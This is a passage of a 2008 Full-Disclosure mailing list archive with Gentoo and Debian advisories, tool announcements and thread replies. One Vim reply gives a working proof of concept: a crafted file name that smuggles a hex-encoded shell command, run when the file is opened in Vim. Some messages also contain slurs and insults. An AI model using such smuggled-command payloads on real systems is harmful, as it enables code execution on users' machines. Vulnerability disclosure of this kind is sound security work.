  zlib extension module might trigger insufficient memory allocation
  and a buffer overflow via a negative signed integer (CVE-2008-1721).

* Justin Ferguson discovered that insufficient input validation in
  the PyString_FromStringAndSize() function might lead to a buffer
  overflow (CVE-2008-1887).

Impact
======

A remote attacker could exploit these vulnerabilities to cause a Denial
of Service or possibly the remote execution of arbitrary code with the
privileges of the user running Python.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

The imageop module is no longer built in the unaffected versions.

All Python 2.3 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"

All Python 2.4 users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"

References
==========

  [ 1 ] CVE-2008-1679
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
  [ 2 ] CVE-2008-1721
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
  [ 3 ] CVE-2008-1887
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment.bin

From keytoaster at gentoo.org Tue Jul 1 12:59:36 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Tue, 01 Jul 2008 13:59:36 +0200
Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of arbitrary code
Message-ID: <486A1C28.3010409@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200807-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Motion: Execution of arbitrary code
      Date: July 01, 2008
      Bugs: #227053
        ID: 200807-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in Motion might result in the execution of
arbitrary code.

Background
==========

Motion is a program that monitors the video signal from one or more
cameras and is able to detect motions.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  media-video/motion      < 3.2.10.1                    >= 3.2.10.1

Description
===========

Nico Golde reported an off-by-one error within the read_client()
function in the webhttpd.c file, leading to a stack-based buffer
overflow. Stefan Cornelius (Secunia Research) reported a boundary error
within the same function, also leading to a stack-based buffer
overflow. Both vulnerabilities require that the HTTP Control interface
is enabled.

Impact
======

A remote attacker could exploit these vulnerabilities by sending an
overly long or specially crafted request to a vulnerable Motion HTTP
control interface, possibly resulting in the execution of arbitrary
code with the privileges of the motion user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Motion users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"

References
==========

  [ 1 ] CVE-2008-2654
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200807-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 197 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment.bin

From berendjanwever at gmail.com Tue Jul 1 13:18:34 2008
From: berendjanwever at gmail.com (Berend-Jan Wever)
Date: Tue, 1 Jul 2008 14:18:34 +0200
Subject: [Full-disclosure] Alphanumeric shellcode improvements
Message-ID: <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@mail.gmail.com>

Hi all,

I've not had as much opportunity in the last three years to contribute, but
I do have some new stuff:

I've decided to pre-release some parts of ALPHA3, the upcoming new version
of my alphanumeric shellcode encoder:

* I've reduced the size of the mixedcase ascii decoder:
  http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
* I've created a lowercase ascii decoder:
  http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
* I've created a mixedcase ascii decoder for x64:
  http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64

See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and
some documentation.

Cheers,

SkyLined

--
Berend-Jan "SkyLined" Wever
Email & Live messenger: berendjanwever at gmail.com
--
'The historical abuses of new data occurred between the time that a few
people learned the important thing and the time when that important thing
became general knowledge. To the Gowachin and to BuSab it was the "Data
Gap," a source of constant danger.' -- Frank Herbert, 'The Dosadi
Experiment'

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment.html

From mrdkaaa at stream.cz Tue Jul 1 15:39:54 2008
From: mrdkaaa at stream.cz (mrdkaaa at stream.cz)
Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
Message-ID: <4.4-28953-1047754371-1214923194@stream.cz>

This vulnerability is at least two years old. Anyway, what's the point of
releasing a security advisory for a vendor well known to never patch it?

From rdancer at rdancer.org Tue Jul 1 20:36:29 2008
From: rdancer at rdancer.org (Jan Minář)
Date: Tue, 1 Jul 2008 20:36:29 +0100
Subject: [Full-disclosure] Collection of Vulnerabilities in Fully Patched Vim 7.1
In-Reply-To: <200806141309.m5ED9bLg058230@moolenaar.net>
References: <6edf76c20806131543k4f78dec8y268eeee2468c7dea@mail.gmail.com>
	<200806141309.m5ED9bLg058230@moolenaar.net>
Message-ID: <6edf76c20807011236t7f96955h924c2692705b6ff4@mail.gmail.com>

On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar wrote:
>
> Jan Minar wrote:
>
>> 1. Summary
>>
>> Product  : Vim -- Vi IMproved
>> Version  : Tested with 7.1.314 and 6.4
>> Impact   : Arbitrary code execution
>> Wherefrom: Local and remote
>> Original : http://www.rdancer.org/vulnerablevim.html
>>
>> Improper quoting in some parts of Vim written in the Vim Script can lead to
>> arbitrary code execution upon opening a crafted file.

> Note that version 7.1.314, as reported in the Summary, does not have
> most of the reported problems. The problems in the plugins have also
> been fixed, this requires updating the runtime files. Information about
> that can be found at http://www.vim.org/runtime.php

I do apologize: as written in the advisory, the version I worked with
was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have updated
the advisory at http://www.rdancer.org/vulnerablevim.html . Thanks to
Bram for all the good work.

7.2a.10 with updated runtime is still vulnerable to the zipplugin
attack, and an updated tarplugin attack:

-------------------------------------------
-------- Test results below ---------------
-------------------------------------------
filetype.vim
  strong  : EXPLOIT FAILED
  weak    : EXPLOIT FAILED
tarplugin : EXPLOIT FAILED
tarplugin.updated: VULNERABLE
zipplugin : VULNERABLE
xpm.vim
  xpm     : EXPLOIT FAILED
  xpm2    : EXPLOIT FAILED
  remote  : EXPLOIT FAILED
gzip_vim  : EXPLOIT FAILED
netrw     : EXPLOIT FAILED

The original tarplugin exploit now produces a string of telling error
messages:

/bin/bash: so%: command not found
tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
/bin/bash: retu: command not found
/bin/bash: bar.tar|retu|'bar.tar: command not found

It's easy to see that it is still possible to execute arbitrary shell
commands.

$VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:

   136   if tarfile =~# '\.\(gz\|tgz\)$'
   137 "   call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
  *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
   139   elseif tarfile =~# '\.lrp'
   140 "   call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
  *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
   142   elseif tarfile =~# '\.bz2$'
   143 "   call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
  *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
   145   else
   146 "   call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
 **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
[...]
   444 fun s:Escape(name)
   445   " shellescape() was added by patch 7.0.111
   446   if exists("*shellescape")
   447    let qnameq= shellescape(a:name)
   448   else
   449    let qnameq= g:tar_shq . a:name . g:tar_shq
   450   endif
   451   return qnameq
   452 endfun

(*)  s:Escape() does not suffice, as it fails to escape ``%'' and
     friends.

(**) tar(1) allows arbitrary command execution via options
     ``--to-command'', and ``--use-compress-program''.

The updated tarplugin attack is rather simple:

$ rm -rf ./*
$ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 | xxd -r\`;'bar.tar"
$ vim +:q ./foo*
$ ls -l pwned
-rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned

Cheers,
Jan Minar.

From skx at debian.org Tue Jul 1 21:25:39 2008
From: skx at debian.org (Steve Kemp)
Date: Tue, 1 Jul 2008 21:25:39 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages fix denial of service
Message-ID: <20080701202539.GA32605@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1600-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
July 01, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : sympa
Vulnerability  : dos
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-1648
Debian Bug     : 475163

It was discovered that sympa, a modern mailing list manager, would
crash when processing certain types of malformed messages.

For the stable distribution (etch), this problem has been fixed in version
5.2.3-1.2+etch1.

For the unstable distribution (sid), this problem has been fixed in
version 5.3.4-4.

We recommend that you upgrade your sympa package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S
6REh7OX9zxqgWYGHqQWtEpQ=
=ANTa
-----END PGP SIGNATURE-----

From lcamtuf at dione.cc Wed Jul 2 01:02:02 2008
From: lcamtuf at dione.cc (Michal Zalewski)
Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
Subject: [Full-disclosure] [tool] ratproxy - passive web application security assessment tool
Message-ID:

Hi all,

I am happy to announce that we've just open sourced ratproxy - a free,
passive web security assessment tool. This utility is designed to
transparently analyze legitimate, browser-driven interactions with tested
web applications - and automatically pinpoint, annotate, and prioritize
potential flaws or areas of concern on the fly.

The proxy analyzes problems such as cross-site script inclusion threats,
insufficient cross-site request forgery defenses, caching issues,
potentially unsafe cross-domain code inclusion schemes and information
leakage scenarios, and much more.

For a detailed discussion of the utility, please visit:

  http://code.google.com/p/ratproxy/wiki/RatproxyDoc

Source code is available at:

  http://code.google.com/p/ratproxy/downloads/list

And finally, screenshot of a sample report can be found here:

  http://lcamtuf.coredump.cx/ratproxy-screen.png

The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since
it is in beta, there might be some kinks to be ironed out, and not all web
technologies might be properly accounted for. Feedback is appreciated.

Please keep in mind that the proxy is meant to highlight interesting
patterns in web applications; a further analysis by a security
professional is required to interpret the significance of results for a
particular platform.

Cheers,
/mz

From filipe at balestra.com.br Wed Jul 2 06:19:01 2008
From: filipe at balestra.com.br (Filipe Balestra)
Date: Wed, 2 Jul 2008 02:19:01 -0300
Subject: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege Escalation Vulnerability
Message-ID:

mrdkaaa, are you saying that this vulnerability is not new to the public?

The program phgrafx had some vulnerabilities published, but this one is
not the same as any other that I can find in securityfocus. One program
can have a lot of vulnerabilities :)

But yes, this vulnerability is at least four years old, but was not
public.

Anyway, QNX released Service Packs to solve some security problems in the
past, and it's not our problem, we are advising the customers, they can
choose or not the company. If you are a customer you probably would like
to know about security issues in all products that you use.

Also, we agree it's a crap vuln, that's why we took too long to release
it. Whatever, why hold it?

p.s.: Rodrigo and I are no longer working for Scanit, so it's just a
personal opinion, not a company official position. If you want to know
about the company vulnerability release process or any other information,
please, contact the Scanit R&D team.

Cheers,
Filipe Alcarde Balestra

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment.html

From tonnerre.lombard at sygroup.ch Wed Jul 2 07:29:43 2008
From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard)
Date: Wed, 2 Jul 2008 08:29:43 +0200
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
In-Reply-To:
References:
Message-ID: <20080702082943.2811aba5@wssyg117.sygroup-int.ch>

Salut,

On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> Are you ready for a site that isn't full of fagottry? Where Gadi cant
> steal your money or eat your lunches? Where you can freely submit
> lulz to be published? Where Theo's defeat and denial are brought to
> light? Wait no more!

You mean a site which evidently cannot tell the difference between
local and remote root vulnerabilities?

(The local root exploit for obsd4 which is published on that site
contains a patch to increment the count of _remote_ vulnerabilities on
the obsd web site.)

				Tonnerre
--
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33		Güterstrasse 86
Fax:+41 61 383 14 67		4053 Basel
Web:www.sygroup.ch		tonnerre.lombard at sygroup.ch

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 835 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment.bin

From deepsec at deepsec.net Tue Jul 1 20:47:36 2008
From: deepsec at deepsec.net (DeepSec 2008)
Date: Tue, 01 Jul 2008 21:47:36 +0200
Subject: [Full-disclosure] Deepsec Talks 2007 are online - registration for 2008 is open
Message-ID: <486A89D8.2000303@deepsec.net>

Dear Madam, dear Sir,

DeepSec Vienna, the annual In-Depth Security Conference has opened
online registrations for 2008. Registrations will receive a discount of
5% off the regular fees until August 31st if you use the following
promotional code:

  earlybird-L4KZIEUE

on our online registration form at https://deepsec.net/register/

Videos from 2007 are online:
Also we are happy to announce that talks from last year's conference are
online. Listen to last year's talks in full length at:
http://video.google.com/videosearch?q=deepsec&sitesearch=#

Call for Papers still Open for two weeks:
If you have some good ideas for a Talk at the conference and haven't
decided yet to submit we encourage you to do so now. We still accept
submissions at https://deepsec.net/cfp/ or via e-mail to:
cfp at deepsec.net

We hope to hear from you and of course to meet in Vienna in November!

Best Regards,

Paul Böhm, René Pfeiffer, Michael Kafka
DeepSec GmbH

--
DeepSec In-Depth Security Conference
November 11th to 14th 2008, Vienna, Austria
https://deepsec.net/

From root_ at fibertel.com.ar Wed Jul 2 08:08:38 2008
From: root_ at fibertel.com.ar (root)
Date: Wed, 02 Jul 2008 04:08:38 -0300
Subject: [Full-disclosure] Full-Disclosure? introducing lul-disclosure.
In-Reply-To:
References:
Message-ID: <486B2976.8000708@fibertel.com.ar>

You couldn't do the remote exploit even with a google video documenting
it step by step.

More like fail-disclosure.

staff wrote:
> Are you ready for a site that isn't full of fagottry? Where Gadi cant steal
> your money or eat your lunches? Where you can freely submit lulz to be
> published? Where Theo's defeat and denial are brought to light? Wait no
> more!
>
> http://lul-disclosure.net/
>
> WhiteHat? BlackHat? We are lulzhat.
> Fuck you and your hats.
>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From gigiyousef at hotmail.com Wed Jul 2 12:15:35 2008
From: gigiyousef at hotmail.com (badr muhyeddin)
Date: Wed, 2 Jul 2008 14:15:35 +0300
Subject: [Full-disclosure] Full-Disclosure Digest, Vol 41, Issue 3
In-Reply-To:
References:
Message-ID:

> From: full-disclosure-request at lists.grok.org.uk> Subject: Full-Disclosure Digest, Vol 41, Issue 3> To: full-disclosure at lists.grok.org.uk> Date: Wed, 2 Jul 2008 12:00:01 +0100> > Send Full-Disclosure mailing list submissions to> full-disclosure at lists.grok.org.uk> > To subscribe or unsubscribe via the World Wide Web, visit> https://lists.grok.org.uk/mailman/listinfo/full-disclosure> or, via email, send a message with subject or body 'help' to> full-disclosure-request at lists.grok.org.uk> > You can reach the person managing the list at> full-disclosure-owner at lists.grok.org.uk> > When replying, please edit your Subject line so it is more specific> than "Re: Contents of Full-Disclosure digest..."> > > Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.> > > Today's Topics:> > 1. [ GLSA 200807-01 ] Python: Multiple integer overflows> (Tobias Heinlein)> 2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code> (Tobias Heinlein)> 3. Alphanumeric shellcode improvements (Berend-Jan Wever)> 4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (mrdkaaa at stream.cz)> 5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1> ( Jan Min?? )> 6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of> service (Steve Kemp)> 7. [tool] ratproxy - passive web application security assessment> tool (Michal Zalewski)> 8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation> Vulnerability (Filipe Balestra)> 9. Re: Full-Disclosure? introducing lul-disclosure.> (Tonnerre Lombard)> 10. Deepsec Talks 2007 are online - registration for 2008 is open> (DeepSec 2008)> 11. Re: Full-Disclosure? introducing lul-disclosure. (root)> > > ----------------------------------------------------------------------> > Message: 1> Date: Tue, 01 Jul 2008 13:51:43 +0200> 
> From: Tobias Heinlein
> Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer
>   overflows
> To: gentoo-announce at gentoo.org
> Cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,
>   security-alerts at linuxsecurity.com
> Message-ID: <486A1A4F.1080404 at gentoo.org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory                           GLSA 200807-01
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                                             http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
>   Severity: Normal
>      Title: Python: Multiple integer overflows
>       Date: July 01, 2008
>       Bugs: #216673, #217221
>         ID: 200807-01
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple integer overflows may allow for Denial of Service.
>
> Background
> ==========
>
> Python is an interpreted, interactive, object-oriented programming
> language.
>
> Affected packages
> =================
>
>     -------------------------------------------------------------------
>      Package          /  Vulnerable  /                      Unaffected
>     -------------------------------------------------------------------
>   1  dev-lang/python     < 2.4.4-r13                     *>= 2.3.6-r6
>                                                          >= 2.4.4-r13
>
> Description
> ===========
>
> Multiple vulnerabilities were discovered in Python:
>
> * David Remahl reported multiple integer overflows in the file
>   imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).
>   This issue is due to an incomplete fix for CVE-2007-4965.
>
> * Justin Ferguson discovered that an integer signedness error in the
>   zlib extension module might trigger insufficient memory allocation
>   and a buffer overflow via a negative signed integer (CVE-2008-1721).
>
> * Justin Ferguson discovered that insufficient input validation in
>   the PyString_FromStringAndSize() function might lead to a buffer
>   overflow (CVE-2008-1887).
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities to cause a Denial
> of Service or possibly the remote execution of arbitrary code with the
> privileges of the user running Python.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> The imageop module is no longer built in the unaffected versions.
>
> All Python 2.3 users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"
>
> All Python 2.4 users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"
>
> References
> ==========
>
>   [ 1 ] CVE-2008-1679
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
>   [ 2 ] CVE-2008-1721
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
>   [ 3 ] CVE-2008-1887
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
>   http://security.gentoo.org/glsa/glsa-200807-01.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security at gentoo.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> ------------------------------
>
> Message: 2
> Date: Tue, 01 Jul 2008 13:59:36 +0200
> From: Tobias Heinlein
> Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of
>   arbitrary code
> To: gentoo-announce at gentoo.org
> Cc: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,
>   security-alerts at linuxsecurity.com
> Message-ID: <486A1C28.3010409 at gentoo.org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory                           GLSA 200807-02
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>                                             http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
>   Severity: Normal
>      Title: Motion: Execution of arbitrary code
>       Date: July 01, 2008
>       Bugs: #227053
>         ID: 200807-02
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple vulnerabilities in Motion might result in the execution of
> arbitrary code.
>
> Background
> ==========
>
> Motion is a program that monitors the video signal from one or more
> cameras and is able to detect motions.
>
> Affected packages
> =================
>
>     -------------------------------------------------------------------
>      Package             /  Vulnerable  /                   Unaffected
>     -------------------------------------------------------------------
>   1  media-video/motion     < 3.2.10.1                     >= 3.2.10.1
>
> Description
> ===========
>
> Nico Golde reported an off-by-one error within the read_client()
> function in the webhttpd.c file, leading to a stack-based buffer
> overflow. Stefan Cornelius (Secunia Research) reported a boundary error
> within the same function, also leading to a stack-based buffer
> overflow. Both vulnerabilities require that the HTTP Control interface
> is enabled.
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities by sending an
> overly long or specially crafted request to a vulnerable Motion HTTP
> control interface, possibly resulting in the execution of arbitrary
> code with the privileges of the motion user.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All Motion users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"
>
> References
> ==========
>
>   [ 1 ] CVE-2008-2654
>         http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
>   http://security.gentoo.org/glsa/glsa-200807-02.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security at gentoo.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> ------------------------------
>
> Message: 3
> Date: Tue, 1 Jul 2008 14:18:34 +0200
> From: "Berend-Jan Wever"
> Subject: [Full-disclosure] Alphanumeric shellcode improvements
> To: full-disclosure at lists.grok.org.uk
> Message-ID:
>   <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9 at mail.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi all,
>
> I've not had as much opportunity in the last three years to contribute, but
> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,
> the upcoming new version of my alphanumeric shellcode encoder:
> * I've reduced the size of the mixedcase ascii decoder:
>   http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a lowercase ascii decoder:
>   http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a mixedcase ascii decoder for x64:
>   http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64
> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and
> some documentation.
>
> Cheers,
> SkyLined
>
> --
> Berend-Jan "SkyLined" Wever
> Email & Live messenger: berendjanwever at gmail.com
> --
> 'The historical abuses of new data occurred between the time that a few
> people learned the important thing and the time when that important thing
> became general knowledge. To the Gowachin and to BuSab it was the "Data
> Gap," a source of constant danger.'
>  -- Frank Herbert, 'The Dosadi Experiment'
>
> ------------------------------
>
> Message: 4
> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
> From: mrdkaaa at stream.cz
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
>   Escalation Vulnerability
> To: full-disclosure at lists.grok.org.uk
> Message-ID: <4.4-28953-1047754371-1214923194 at stream.cz>
> Content-Type: text/plain; charset="us-ascii"
>
> This vulnerability is at least two years old. Anyway, what's the point of releasing
> a security advisory for a vendor well known to never going to patch it?
>
> ------------------------------
>
> Message: 5
> Date: Tue, 1 Jul 2008 20:36:29 +0100
> From: " Jan Minář "
> Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully
>   Patched Vim 7.1
> To: full-disclosure at lists.grok.org.uk, bugtraq at securityfocus.com,
>   vim_dev at googlegroups.com, "Bram Moolenaar"
> Cc: bugs at vim.org
> Message-ID:
>   <6edf76c20807011236t7f96955h924c2692705b6ff4 at mail.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar wrote:
> >
> > Jan Minar wrote:
> >
> >> 1. Summary
> >>
> >> Product  : Vim -- Vi IMproved
> >> Version  : Tested with 7.1.314 and 6.4
> >> Impact   : Arbitrary code execution
> >> Wherefrom: Local and remote
> >> Original : http://www.rdancer.org/vulnerablevim.html
> >>
> >> Improper quoting in some parts of Vim written in the Vim Script can lead to
> >> arbitrary code execution upon opening a crafted file.
>
> > Note that version 7.1.314, as reported in the Summary, does not have
> > most of the reported problems. The problems in the plugins have also
> > been fixed, this requires updating the runtime files. Information about
> > that can be found at http://www.vim.org/runtime.php
>
> I do apologize: as written in the advisory, the version I worked with
> was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
> updated the advisory at http://www.rdancer.org/vulnerablevim.html .
>
> Thanks to Bram for all the good work.
>
> 7.2a.10 with updated runtime is still vulnerable to the zipplugin
> attack, and an updated tarplugin attack:
>
> -------------------------------------------
> -------- Test results below ---------------
> -------------------------------------------
> filetype.vim
>   strong  : EXPLOIT FAILED
>   weak    : EXPLOIT FAILED
> tarplugin : EXPLOIT FAILED
> tarplugin.updated: VULNERABLE
> zipplugin : VULNERABLE
> xpm.vim
>   xpm     : EXPLOIT FAILED
>   xpm2    : EXPLOIT FAILED
>   remote  : EXPLOIT FAILED
> gzip_vim  : EXPLOIT FAILED
